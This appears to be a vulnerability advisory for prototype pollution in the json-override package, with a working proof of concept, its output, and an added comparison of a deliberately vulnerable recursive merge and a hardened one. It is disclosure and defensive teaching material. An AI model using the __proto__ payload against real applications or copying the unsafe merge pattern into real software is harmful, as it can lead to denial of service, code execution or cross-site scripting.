Affected versions of this package are vulnerable to Prototype Pollution. The merge recursively assigns properties from the source object to the destination object without filtering keys, so an attacker who controls the source can supply __proto__ as a key and have the recursion write into the global Object.prototype. Depending on how the application consumes the polluted properties, this can be escalated to denial of service, remote code execution or cross-site scripting.
json-override/json-override.js:18
PoC:
(async () => {
  const lib = await import('json-override');
  // Attacker-controlled input: the "__proto__" key survives JSON.parse as an own property.
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  // An unrelated object that the merge never touches directly.
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // The recursive merge resolves dest.__proto__ to Object.prototype and assigns "polluted" there.
    lib.default({}, BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Restore the global prototype.
  delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
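As an added illustration (not the json-override source or its API): a minimal recursive merge that exhibits the flawed pattern described above, beside a hardened version that drops the keys able to reach a prototype and only recurses into the destination's own properties. The function names unsafeMerge, safeMerge and demonstratePollution and the payload are constructed for this example.

```javascript
// Added example: a minimal recursive merge with the flaw class described in
// this advisory, beside a hardened version. Illustrative code only; this is
// NOT the json-override implementation.

// Keys that let a source object reach the prototype chain of the destination
// (and, through Object.prototype, of every object in the process).
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable pattern: copy every key from src into dest, recursing when both
// sides hold an object. On a fresh object dest['__proto__'] resolves to
// Object.prototype, so a "__proto__" key in src recurses into the global
// prototype and writes attacker-controlled properties there.
function unsafeMerge(dest, src) {
  for (const key in src) {
    if (isPlainObject(src[key]) && isPlainObject(dest[key])) {
      unsafeMerge(dest[key], src[key]);
    } else {
      dest[key] = src[key];
    }
  }
  return dest;
}

// Hardened pattern: iterate only own keys, reject the keys that can reach a
// prototype, and recurse only into an *own* plain object on dest (never an
// inherited one). An allow-list of expected keys would be stricter still.
function safeMerge(dest, src) {
  for (const key of Object.keys(src)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = src[key];
    if (isPlainObject(value)) {
      const ownObject =
        Object.prototype.hasOwnProperty.call(dest, key) && isPlainObject(dest[key]);
      if (!ownObject) dest[key] = {};
      safeMerge(dest[key], value);
    } else {
      dest[key] = value;
    }
  }
  return dest;
}

// Feeds the advisory's payload (constructed attacker input) through a merge
// function and reports whether an unrelated object picked up the injected
// property. Global state is restored afterwards so the check is repeatable.
function demonstratePollution(merge) {
  const payload = JSON.parse('{"__proto__":{"polluted":true}}');
  const victim = {}; // never passed to the merge
  let leaked;
  try {
    merge({}, payload);
  } finally {
    leaked = victim.polluted === true;
    delete Object.prototype.polluted;
  }
  return leaked;
}

console.log('unsafeMerge pollutes Object.prototype:', demonstratePollution(unsafeMerge)); // true
console.log('safeMerge pollutes Object.prototype:  ', demonstratePollution(safeMerge));   // false
```

The hardened version blocks both the direct __proto__ path and the constructor.prototype path, and the hasOwnProperty check matters independently of the key filter: recursing into an inherited property is exactly how the flawed pattern walks off the destination object and onto a shared prototype.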
The maintainer has not provided a fix in the two months since the vulnerability was reported.